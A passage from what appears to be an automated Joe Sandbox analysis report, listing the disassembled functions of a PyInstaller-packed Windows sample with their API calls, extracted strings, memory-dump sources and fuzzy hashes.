                                                              • API String ID: 1431749950-1981414212
                                                              • Opcode ID: f54770ac84b8c5300f15358e4cffcff24408fff1c96f1f72ed2546603f76ac2f
                                                              • Instruction ID: b397c2a27b067a571d703e76a7ce5101cc968c296dd086e591209ebe9bd08ea9
                                                              • Opcode Fuzzy Hash: f54770ac84b8c5300f15358e4cffcff24408fff1c96f1f72ed2546603f76ac2f
                                                              • Instruction Fuzzy Hash: 43419D26F0E617C6E710AB01E5619B822E0EB457D4F884135EDAD87AFCEF3CE5859700
                                                              Function 00007FF6FB1ECFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED06D
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED07B
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED0A5
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED113
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED11F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                              • Instruction ID: a5c4d9d5d5bab91ca0f4aeb956cdfdd91acae7b12b79009de08f85f301f8d72b
                                                              • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                              • Instruction Fuzzy Hash: 43317A35B1AA4B81EB21DB12A80467D6294BB0CBA8F5A0535DD3D87BE0FE3CF4468300
                                                              Function 00007FFDFB003779 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: MASK:$default$nombstr$pkix$utf8only
                                                              • API String ID: 2248877218-3483942737
                                                              • Opcode ID: a21ae9ee1a6a80a1cd62bd08bae20b9b71c674710c0f9c2fb243c96c79f53681
                                                              • Instruction ID: 667cd258f7b7d9297510530cc1b27f503e2de559a7c2cf78ac7d203eb393cbc4
                                                              • Opcode Fuzzy Hash: a21ae9ee1a6a80a1cd62bd08bae20b9b71c674710c0f9c2fb243c96c79f53681
                                                              • Instruction Fuzzy Hash: 7A311622B1958392EB418B18E4A0BB87794EB46740F445232EB7E876EADE2CE490C700
                                                              Function 00007FF6FB1E7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID:
                                                              • API String ID: 995526605-0
                                                              • Opcode ID: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                              • Instruction ID: 9f68bda16038fa0af6870d5dab42bb87e4d3b2bb3bba1e13ac5367b6b9894744
                                                              • Opcode Fuzzy Hash: 8356e17e6427c03366acad688ef96df5430cd8c67dfe58d52091e88c81740b7d
                                                              • Instruction Fuzzy Hash: 9D212125E0CA4341EB209B55F59427EA3A5EB897A8F140235EA7DC3AF4EF6CE4498700
                                                              Function 00007FF6FB1FA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                              • Instruction ID: dc7fb6c9b439329b3f1eebeaee82eec497c0604bf2e99167f223d5535a857021
                                                              • Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                              • Instruction Fuzzy Hash: 72214C21E5C24342FB68E721965917D61A29F8C7F8F184734E93EC6AF6FE2CA441C701
                                                              Function 00007FF6FB1E29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorFormatLast
                                                              • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                              • API String ID: 3971115935-1149178304
                                                              • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                              • Instruction ID: 4482e84b6ad5bf65a74e22d03059101e436914d5d6b236a7b2aded1bae0be53d
                                                              • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                              • Instruction Fuzzy Hash: A5212176618A8682E730DB10F5546EE6364FB8C7C8F400136EA9D93AA8EF7CD5568740
                                                              Function 00007FF6FB20707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                              • Instruction ID: 7b53d6fa7f3dbf827f2a487b1539fd8aa51851257c78a003142cb659cb094a80
                                                              • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                              • Instruction Fuzzy Hash: DE115121A18A4786E7609B56E958339A2A0FB9CBE4F045234EA6EC77F4EF7CD414C740
                                                              Function 00007FF6FB1E81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E821D
                                                              • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E827A
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8305
                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8364
                                                              • FreeLibrary.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8375
                                                              • FreeLibrary.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E838A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                              • String ID:
                                                              • API String ID: 3462794448-0
                                                              • Opcode ID: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                              • Instruction ID: 15b841edd0ea822cfbb58ef6fca21af6a6028b9fa1b58d3e308299b92fd91964
                                                              • Opcode Fuzzy Hash: c116373e2a09e68fc95a37a35a910f387ed59b49a7d0ab4690c2b7d3ff367989
                                                              • Instruction Fuzzy Hash: 7C415E62E19A8381EB70DB11A5442AE6394FB8DBC8F444135DF6D97BE9EE3CE501C700
                                                              Function 00007FF6FB1E8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6FB1E7B70
                                                                • Part of subcall function 00007FF6FB1E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6FB1E7B83
                                                                • Part of subcall function 00007FF6FB1E7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6FB1E7BA8
                                                                • Part of subcall function 00007FF6FB1E7B50: GetLastError.KERNEL32 ref: 00007FF6FB1E7BB2
                                                                • Part of subcall function 00007FF6FB1E7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6FB1E7BF2
                                                                • Part of subcall function 00007FF6FB1E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6FB1E7C0E
                                                                • Part of subcall function 00007FF6FB1E7B50: CloseHandle.KERNEL32 ref: 00007FF6FB1E7C26
                                                              • LocalFree.KERNEL32(?,00007FF6FB1E3814), ref: 00007FF6FB1E848C
                                                              • LocalFree.KERNEL32(?,00007FF6FB1E3814), ref: 00007FF6FB1E8495
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                              • API String ID: 6828938-1529539262
                                                              • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                              • Instruction ID: 8bfa06a4851e46ac826007bb199eff448da766d6db3e1cf6c0b06b7998118862
                                                              • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                              • Instruction Fuzzy Hash: 64212B21E0864381E710EB10E5253FE62A5FB8D784F845435EA6DC3BE6EE3CE545C790
                                                              Function 00007FF6FB1FA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA5E7
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA61D
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA64A
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA65B
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA66C
                                                              • SetLastError.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA687
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                              • Instruction ID: db631e8db13fb1a6b3ccbb68a75881381014553465a5cd4151cc284b9ed3eefa
                                                              • Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                              • Instruction Fuzzy Hash: 86114A21E5C24342FB58E7619A5917D22A25F8C7B8F045734D83EC66F6FE2CB801C701
                                                              Function 00007FF6FB1E2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                              • String ID: Unhandled exception in script
                                                              • API String ID: 3081866767-2699770090
                                                              • Opcode ID: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                              • Instruction ID: 78ab12e641600f7cf6fd2a0d0f3732bdc9268598fceeba26a7463725195367fa
                                                              • Opcode Fuzzy Hash: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
                                                              • Instruction Fuzzy Hash: 18311F76A0968385EB20EF61E9652F96364FF8D788F440135EA5E86BA5EF3CD104C700
                                                              Function 00007FF6FB1E2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                              • API String ID: 1878133881-640379615
                                                              • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                              • Instruction ID: af085a4454aabcc04595b0d90461438e07fab35b77b42f48f0c653e33665c215
                                                              • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                              • Instruction Fuzzy Hash: 15212172A1868781E730DB10F4617EE6364FB88788F401136E69D93AE9EF7CE655C740
                                                              Function 00007FF6FB1F8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                              • Instruction ID: 9a6ff5160032f93f13c2f460ae862feda53ae65771ff672f3f30334ae9f44df5
                                                              • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                              • Instruction Fuzzy Hash: 15F09625B1970381EB209B24E49837D5320AF8DBA5F581635D57EC61F4EF3DD149D310
                                                              Function 00007FF6FB208678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction ID: 620594066fdd09bc23555b06cb731c534d9d0e903a29610f9efb70cb57adf806
                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction Fuzzy Hash: B9118F36E58A0341F7541128D67537721406F6D3F4F662634EA7ECE6FAEE2CA8818710
                                                              Function 00007FF6FB1FA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA6BF
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA6DE
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA706
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA717
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA728
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
